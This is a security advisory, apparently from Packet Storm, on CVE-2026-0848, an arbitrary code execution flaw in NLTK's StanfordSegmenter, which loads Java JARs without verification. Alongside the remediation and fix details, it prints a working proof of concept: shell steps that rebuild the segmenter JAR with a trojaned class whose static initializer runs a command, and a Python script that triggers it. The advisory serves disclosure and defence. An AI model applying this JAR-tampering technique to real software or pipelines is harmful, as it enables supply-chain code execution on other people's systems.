📄 NLTK StanfordSegmenter 3.9.2 Arbitrary Code Execution

31 Mar 2026 · Reported by Sarvesh Patil · Type: packetstorm · Source: packetstorm.news

NLTK StanfordSegmenter loads external Java jars without verification, enabling supply-chain remote code execution.

| Reporter | Title | Published | Family |
|---|---|---|---|
| Huntr | Arbitrary Code Execution in NLTK StanfordSegmenter via untrusted JAR loading | 5 Dec 2025 20:47 | huntr |
| Huntr | Incomplete Fix for CVE-2026-0848: 5 Stanford Interface Classes Still Vulnerable to Untrusted JAR Code Execution | 5 Apr 2026 00:58 | huntr |
| IBM Security Bulletins | Security Bulletin: Multiple Vulnerabilities in NLTK bundled with IBM Fusion, IBM Fusion HCI, and IBM Fusion Content-Aware Storage | 17 Jun 2026 13:55 | ibm |
| IBM Security Bulletins | Security Bulletin: Maximo AI Service uses multiple third party dependencies which is vulnerable to multiple CVEs. | 27 Apr 2026 07:43 | ibm |
| IBM Security Bulletins | Security Bulletin: IBM Watson Speech Services Cartridge is vulnerable to arbitrary code execution in NLTK [CVE-2026-0848] | 14 Apr 2026 15:18 | ibm |
| GithubExploit | Exploit for CVE-2026-0848 | 31 Mar 2026 14:34 | githubexploit |
| ATTACKERKB | CVE-2026-0848 | 5 Mar 2026 20:48 | attackerkb |
| BDU FSTEC | A vulnerability in the StanfordSegmenter module of the NLTK natural language processing library allows an attacker to execute arbitrary code. | 9 Jun 2026 00:00 | bdu_fstec |
| Circl | CVE-2026-0848 | 5 Mar 2026 22:06 | circl |
| CNNVD | NLTK input validation error vulnerability | 5 Mar 2026 00:00 | cnnvd |

# CVE-2026-0848 — NLTK StanfordSegmenter: Arbitrary Code Execution via Untrusted JAR Loading
    
    <p align="center">
      <img src="https://img.shields.io/badge/CVE-2026--0848-critical?style=for-the-badge&color=8B0000" />
      <img src="https://img.shields.io/badge/Severity-Critical%20(CVSS%2010.0)-red?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Affected-NLTK%20%3C%3D%203.9.2-yellow?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Type-CWE--20%20Improper%20Input%20Validation-blue?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Fix-Merged%20(PR%20%233522)-brightgreen?style=for-the-badge" />
    </p>
    
    ---
    
    ## Overview
    
    | Field | Details |
    |---|---|
    | **CVE ID** | CVE-2026-0848 |
    | **Package** | `nltk` (Natural Language Toolkit) |
    | **Registry** | PyPI |
    | **Affected Versions** | `<= 3.9.2` |
    | **Vulnerability Type** | CWE-20: Improper Input Validation |
    | **CVSS Score** | 10.0 (Critical) |
    | **Attack Vector** | Network |
    | **Attack Complexity** | Low |
    | **Privileges Required** | None |
    | **User Interaction** | None |
    | **Scope** | Changed |
    | **Confidentiality Impact** | High |
    | **Integrity Impact** | High |
    | **Availability Impact** | High |
    | **Reported On** | December 6, 2025 |
    | **CVE Published** | March 2026 |
    | **Supported By** | Palo Alto Networks / Prisma AIRS |
    
    ---
    
    ## Description
    
    `nltk.tokenize.StanfordSegmenter` dynamically loads external Java `.jar` files via `subprocess` without performing any integrity verification, signature checking, or sandboxing. The class accepts fully attacker-controlled parameters including `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class`, and passes them directly to a `java -cp` invocation.
    
    If an attacker can supply or replace the JAR file (through a poisoned model download, a man-in-the-middle package swap, dependency poisoning, or a corrupted release mirror), arbitrary Java bytecode executes as soon as the JVM initializes the requested class, because static initializer blocks run before any application logic. This constitutes a **supply-chain Remote Code Execution** vulnerability: the payload runs in a separate JVM process, outside any control the Python runtime could enforce.
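The data flow described above can be pictured with a small sketch. This is not NLTK's code: `build_java_command` and the placeholder argument are hypothetical names used only to show that the strings passed by the caller become the JVM classpath and entry point unchanged.

```python
from typing import List


def build_java_command(path_to_jar: str, java_class: str, extra_args: List[str]) -> List[str]:
    """Illustrative only: mirrors the shape of a `java -cp` invocation.

    Whatever string arrives in `path_to_jar` becomes the classpath, and
    whatever arrives in `java_class` becomes the class the JVM initializes.
    Nothing in between inspects the JAR contents.
    """
    return ["java", "-cp", path_to_jar, java_class, *extra_args]


cmd = build_java_command(
    path_to_jar="stanford-segmenter.jar",                 # caller-controlled
    java_class="edu.stanford.nlp.ie.crf.CRFClassifier",   # caller-controlled
    extra_args=["<segmenter-args>"],                      # placeholder, not a real flag
)
print(cmd)
```

Because the command is an argument list rather than a shell string, shell injection is not the issue here; the risk is that the JAR on the classpath is trusted without any check.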
    
    ---
    
    ## Affected Components
    
    | File | Lines | Description |
    |---|---|---|
    | `nltk/tokenize/stanford_segmenter.py` | L53–L118 | Accepts attacker-controlled `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class` with no validation |
    | `nltk/internals.py` | L220–L300 | Launches Java execution directly with user-controlled JAR path and classpath, no sandboxing or checksum verification |
    | `nltk/internals.py` | L109–L152 | `subprocess.Popen()` executes Java with unvalidated classpath input, allowing the JVM to load arbitrary bytecode and run static initializers |
    
    ---
    
    ## CVSS Vector
    
    ```
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    ```
    
    | Metric | Value |
    |---|---|
    | Attack Vector | Network |
    | Attack Complexity | Low |
    | Privileges Required | None |
    | User Interaction | None |
    | Scope | Changed |
    | Confidentiality | High |
    | Integrity | High |
    | Availability | High |
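The 10.0 score in the table follows from the CVSS v3.1 base equations. The sketch below reproduces the arithmetic; the weights are transcribed from the CVSS v3.1 specification as best understood here, and the function names (`roundup`, `base_score`) are illustrative, so treat it as a cross-check rather than a reference calculator.

```python
import math

# Metric weights per the CVSS v3.1 base metric tables.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required depends on whether scope is Unchanged (U) or Changed (C).
PR_WEIGHTS = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, avoiding floating-point artifacts."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    # Drop the "CVSS:3.1" prefix and split the remaining "KEY:VALUE" pairs.
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    scope = metrics["S"]
    iss = 1 - (
        (1 - WEIGHTS["C"][metrics["C"]])
        * (1 - WEIGHTS["I"][metrics["I"]])
        * (1 - WEIGHTS["A"][metrics["A"]])
    )
    if scope == "C":
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = (
        8.22
        * WEIGHTS["AV"][metrics["AV"]]
        * WEIGHTS["AC"][metrics["AC"]]
        * PR_WEIGHTS[scope][metrics["PR"]]
        * WEIGHTS["UI"][metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if scope == "C":
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"))  # 10.0
```

With Scope set to Changed, the raw sum exceeds 10 after the 1.08 multiplier and is capped; the same vector with `S:U` evaluates to 9.8.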
    
    ---
    
    ## Impact
    
    Successful exploitation grants an attacker **full control over the system** running the NLTK segmentation process:
    
    - **Arbitrary Java code execution** — Any bytecode embedded in the malicious JAR runs with the privileges of the Python/Java process
    - **Python runtime escape** — Execution moves into the JVM, bypassing Python-level sandboxing entirely
    - **OS-level command execution** — Attackers can invoke `Runtime.getRuntime().exec()` or `ProcessBuilder` to run arbitrary shell commands
    - **Data theft and modification** — Access to all files, environment variables, API keys, and secrets readable by the process
    - **Full environment compromise** — In CI/CD, production NLP pipelines, or server environments, a single malicious JAR leads to complete host takeover
    
    ### High-Risk Deployment Scenarios
    
    | Scenario | Impact |
    |---|---|
    | ML researcher loads a pretrained segmenter from the internet | Remote attacker gains code execution |
    | Organization downloads a corrupted Chinese segmentation model ZIP | Malware executes inside production NLP pipeline |
    | CI/CD server installs model via `wget`/`unzip` from a non-HTTPS mirror | Full environment compromise |
    | Dependency takeover or poisoned release mirror | Complete supply-chain RCE |
    
    This vulnerability affects any NLP workflow using `StanfordSegmenter`, including chatbots, LLM preprocessing pipelines, dataset segmentation, document classification, and production inference services.
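To find out whether a codebase is exposed, one option is to scan its Python sources for references to `StanfordSegmenter`. The following is a rough sketch using the standard `ast` module; the function name `uses_stanford_segmenter` is hypothetical, and the check will miss wildcard imports and dynamically constructed names.

```python
import ast


def uses_stanford_segmenter(source: str) -> bool:
    """Return True if the source imports or references StanfordSegmenter."""
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.ImportFrom):
            # from nltk.tokenize.stanford_segmenter import ...
            if node.module and node.module.endswith("stanford_segmenter"):
                return True
            # from nltk.tokenize import StanfordSegmenter
            if any(alias.name == "StanfordSegmenter" for alias in node.names):
                return True
        elif isinstance(node, ast.Import):
            # import nltk.tokenize.stanford_segmenter
            if any(alias.name.endswith("stanford_segmenter") for alias in node.names):
                return True
        elif isinstance(node, ast.Attribute) and node.attr == "StanfordSegmenter":
            # nltk.tokenize.StanfordSegmenter(...)
            return True
    return False


sample = "from nltk.tokenize.stanford_segmenter import StanfordSegmenter\n"
print(uses_stanford_segmenter(sample))  # True
```

Running this over every `.py` file in a repository (for example with `pathlib.Path.rglob("*.py")`) gives a first-pass inventory of affected call sites.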
    
    ---
    
    ## Proof of Concept
    
    > **This information is provided for educational and defensive purposes only. Do not test against systems you do not own or have explicit authorization to test.**
    
    ### Step 1 — Replace Core Classifier with Malicious Java Class
    
    ```bash
    cd stanford-segmenter-2020-11-17/merged
    jar xf ../stanford-segmenter-4.2.0.jar
    rm -rf edu/stanford/nlp/ie/crf/CRFClassifier.class
    
    cat << 'EOF' > edu/stanford/nlp/ie/crf/CRFClassifier.java
    package edu.stanford.nlp.ie.crf;
    
    public class CRFClassifier {
        static {
            try {
                System.out.println("\nPayload executed — Code ran on class load!\n");
                Runtime.getRuntime().exec("touch /tmp/pwned_hijack");
            } catch(Exception e){}
        }
        public static void main(String[] args){}
    }
    EOF
    
    javac edu/stanford/nlp/ie/crf/CRFClassifier.java
    jar cfm exploit.jar META-INF/MANIFEST.MF *
    cp exploit.jar ../stanford-segmenter.jar
    ```
    
    ### Step 2 — Build the Malicious JAR
    
    ```bash
    mkdir merged && cd merged
    javac Payload.java
    jar xf ../stanford-segmenter-4.2.0.jar
    jar xf ../stanford-corenlp-4.2.0/stanford-corenlp-4.2.0.jar
    jar cfm exploit.jar META-INF/MANIFEST.MF *
    jar uf exploit.jar Payload.class
    cp exploit.jar ../stanford-segmenter.jar
    cd ..
    ```
    
    ### Step 3 — Trigger via NLTK
    
    ```python
    # test.py
    from nltk.tokenize.stanford_segmenter import StanfordSegmenter
    
    print("[+] Triggering payload via modified Stanford JAR...")
    
    seg = StanfordSegmenter(
        path_to_jar="stanford-segmenter.jar",
        path_to_sihan_corpora_dict="./data/",
        path_to_dict="./data/dict-chris6.ser.gz",
        path_to_model="./data/pku.gz",
        java_class="edu.stanford.nlp.ie.crf.CRFClassifier",
        encoding="utf-8"
    )
    
    print("[+] Running segmentation...")
    print(seg.segment("我爱自然语言处理"))
    ```
    
    **Output:**
    
    ```
    [+] Triggering payload via modified Stanford JAR...
    
    Payload executed — Code ran on class load!
    
    [+] Running segmentation...
    我 爱 自然语言 处理
    ```
    
    **Confirm RCE:**
    
    ```bash
    ls /tmp | grep pwned_hijack
    # pwned_hijack
    ```
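From a defender's point of view, the same tampering can be detected by comparing a suspect JAR against a known-good copy entry by entry. The sketch below assumes a trusted reference JAR is available locally; `entry_digests` and `changed_classes` are illustrative names, not part of NLTK or the Stanford tooling.

```python
import hashlib
import zipfile
from typing import Dict, List


def entry_digests(jar_path: str) -> Dict[str, str]:
    """Map each file entry in a JAR (a ZIP archive) to its SHA-256 digest."""
    with zipfile.ZipFile(jar_path) as jar:
        return {
            info.filename: hashlib.sha256(jar.read(info.filename)).hexdigest()
            for info in jar.infolist()
            if not info.is_dir()
        }


def changed_classes(reference_jar: str, suspect_jar: str) -> List[str]:
    """List .class entries in the suspect JAR that are new or differ from the reference."""
    reference = entry_digests(reference_jar)
    suspect = entry_digests(suspect_jar)
    return sorted(
        name
        for name, digest in suspect.items()
        if name.endswith(".class") and reference.get(name) != digest
    )


# Example (paths are placeholders):
# changed_classes("stanford-segmenter-4.2.0.jar", "stanford-segmenter.jar")
```

For the PoC above, such a comparison would be expected to flag `edu/stanford/nlp/ie/crf/CRFClassifier.class`, since its bytes differ from the original.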
    
    ---
    
    ## Root Cause
    
    The vulnerability exists across two files:
    
    **`stanford_segmenter.py`** — The `StanfordSegmenter` class constructor accepts `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class` as plain string arguments and forwards them directly to the Java execution layer without performing any of the following:
    
    - Path allowlist or trusted-directory enforcement
    - SHA-256 or cryptographic signature verification of the JAR
    - Validation of the `java_class` parameter against a known-safe set of class names
    
    In **`internals.py`**, the `java()` helper launches Java through `subprocess.Popen()` with the user-supplied classpath. The JVM resolves `java_class` from that classpath and initializes it, running its static initializer blocks (and those of any class it goes on to reference) before any application logic. There is no sandbox, no integrity gate, and no mechanism to prevent execution of injected bytecode.
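Two of the missing checks listed above, the trusted-directory rule and the `java_class` allowlist, could look roughly like the following. This is a sketch under stated assumptions, not the upstream fix: `TRUSTED_JAR_DIR`, `ALLOWED_JAVA_CLASSES`, and `validate_segmenter_args` are hypothetical names, and the directory path is a placeholder.

```python
from pathlib import Path

# Hypothetical policy values; adjust to the deployment.
TRUSTED_JAR_DIR = Path("/opt/stanford-segmenter")
ALLOWED_JAVA_CLASSES = frozenset({"edu.stanford.nlp.ie.crf.CRFClassifier"})


def validate_segmenter_args(
    path_to_jar: str,
    java_class: str,
    trusted_dir: Path = TRUSTED_JAR_DIR,
) -> Path:
    """Reject JAR paths outside the trusted directory and unknown entry classes."""
    jar = Path(path_to_jar).resolve()  # collapses ".." and follows symlinks
    root = trusted_dir.resolve()
    if root not in jar.parents:
        raise ValueError(f"JAR path {jar} is outside trusted directory {root}")
    if jar.suffix != ".jar":
        raise ValueError(f"Expected a .jar file, got {jar.name}")
    if java_class not in ALLOWED_JAVA_CLASSES:
        raise ValueError(f"Java class {java_class!r} is not on the allowlist")
    return jar
```

Note that these checks alone would not stop the PoC, which keeps the allowed class name and replaces the class bytes inside the JAR. They narrow where a JAR may come from and should be paired with content verification such as a checksum.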
    
    ---
    
    ## Fix
    
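    A fix for `StanfordSegmenter` has been merged in the upstream NLTK repository. A later huntr report dated 5 Apr 2026 is titled "Incomplete Fix for CVE-2026-0848: 5 Stanford Interface Classes Still Vulnerable to Untrusted JAR Code Execution", so other Stanford wrapper classes may need separate review.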
    
    | Resource | Link |
    |---|---|
    | **Central Security Fix (all CVEs)** | [https://github.com/nltk/nltk/pull/3522](https://github.com/nltk/nltk/pull/3522) |
    | Researcher's initial fix PR | https://github.com/nltk/nltk/pull/3477 (merged) |
    
    Upgrade to a patched version of NLTK as soon as it is available on PyPI.
    
    ---
    
    ## Remediation
    
    | Action | Details |
    |---|---|
    | **Upgrade NLTK** | Update to a version greater than 3.9.2 containing the fix from PR #3522 |
    | **Do Not Use User-Controlled JAR Paths** | Never allow user input to influence `path_to_jar`, `path_to_model`, or `java_class` arguments |
    | **Verify JAR Integrity** | Always verify SHA-256 checksums of downloaded JAR files against official published hashes before use |
    | **Use HTTPS Sources Only** | Download model files and JARs exclusively from official HTTPS sources; reject any HTTP or unverified mirror |
    | **Least Privilege** | Run NLTK-based services under a restricted OS user with minimal filesystem and network permissions |
    | **Containerization** | Isolate NLP services in Docker containers or similar sandboxes to limit the blast radius of JAR-based exploits |
    | **Dependency Monitoring** | Use a software composition analysis tool to detect tampered or replaced JAR dependencies in CI/CD pipelines |
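The "Verify JAR Integrity" row can be implemented with the standard library alone. The sketch below streams the file through SHA-256 and compares the result against a digest obtained out of band; the function names are illustrative, and the expected digest must come from a source you trust (it is not supplied by this advisory).

```python
import hashlib
import hmac


def sha256_of_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Compute the SHA-256 hex digest of a file without loading it all into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_jar(path: str, expected_sha256: str) -> None:
    """Raise RuntimeError if the file's digest does not match the expected value."""
    actual = sha256_of_file(path)
    if not hmac.compare_digest(actual, expected_sha256.strip().lower()):
        raise RuntimeError(
            f"Checksum mismatch for {path}: expected {expected_sha256}, got {actual}"
        )


# Example (placeholder values):
# verify_jar("stanford-segmenter.jar", "<published sha256 hex digest>")
```

Calling `verify_jar` immediately before constructing `StanfordSegmenter` keeps the window between verification and use small, though it does not remove it entirely if the file is writable by other users.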
    
    **Upgrade via pip:**
    
    ```bash
    pip install --upgrade nltk
    ```
    
    **Verify installed version:**
    
    ```bash
    python -c "import nltk; print(nltk.__version__)"
    ```
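The printed version can also be checked programmatically against the affected range (`<= 3.9.2`) given in the Overview. This is a minimal sketch: `is_affected` is a hypothetical helper, it only looks at the leading numeric release segment, and it does not know the first fixed version number, which this advisory does not state.

```python
import re
from typing import Tuple

LAST_AFFECTED = (3, 9, 2)  # from the "Affected Versions" row: <= 3.9.2


def release_tuple(version: str) -> Tuple[int, ...]:
    """Extract the leading numeric release segment, e.g. '3.9.2' -> (3, 9, 2)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"Unrecognized version string: {version!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def is_affected(version: str) -> bool:
    """True if the release is at or below the last affected version."""
    release = release_tuple(version)
    # Pad short versions such as '3.9' to three components before comparing.
    padded = release + (0,) * max(0, 3 - len(release))
    return padded[:3] <= LAST_AFFECTED


print(is_affected("3.9.2"))  # True
print(is_affected("3.9.3"))  # False
```

In a deployment check this would typically be called as `is_affected(nltk.__version__)` after `import nltk`.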
    
    ---
    
    ## Timeline
    
    | Date | Event |
    |---|---|
    | December 6, 2025 | Vulnerability reported to huntr.dev by researcher hyperps1 (Sarvesh Patil) |
    | December 2025 | NLTK maintainer team notified via huntr.dev |
    | January 2026 | NLTK maintainer validated the vulnerability; disclosure bounty awarded |
    | January 2026 | CVE-2026-0848 assigned |
    | January 2026 | Researcher's fix PR #3477 submitted and merged |
    | February 2026 | 48-hour pre-publication warning sent to NLTK maintainers |
    | March 2026 | CVE published on NVD and huntr.dev |
    | March 2026 | Central security fix for all CVEs merged via PR #3522 |
    
    ---
    
    ## References
    
    | Resource | Link |
    |---|---|
    | NVD Entry | https://nvd.nist.gov/vuln/detail/CVE-2026-0848 |
    | Official CVE Record | https://cve.org/CVERecord?id=CVE-2026-0848 |
    | huntr.dev Report | https://huntr.dev |
    | Central Fix PR | https://github.com/nltk/nltk/pull/3522 |
    | Researcher Fix PR | https://github.com/nltk/nltk/pull/3477 |
    | NLTK on PyPI | https://pypi.org/project/nltk/ |
    | Stanford Word Segmenter | https://nlp.stanford.edu/software/segmenter.html |
    | OWASP: Code Injection | https://owasp.org/www-community/attacks/Code_Injection |
    | OWASP: Unsafe Use of Reflection | https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflection |
    | CWE-20: Improper Input Validation | https://cwe.mitre.org/data/definitions/20.html |
    | CWE-502: Deserialization of Untrusted Data | https://cwe.mitre.org/data/definitions/502.html |
    
    ---
    
    ## Disclaimer
    
    This repository documents CVE-2026-0848 strictly for **educational, research, and defensive security purposes**. The proof-of-concept code and technical details are provided to assist developers, security engineers, and system administrators in understanding, assessing, and remediating this vulnerability.
    
    Any use of this information to access or compromise systems without explicit authorization is illegal and unethical. The author assumes no liability for misuse of the information contained herein.
    
    Contributors: [ketanHub](https://github.com/ketanHub)
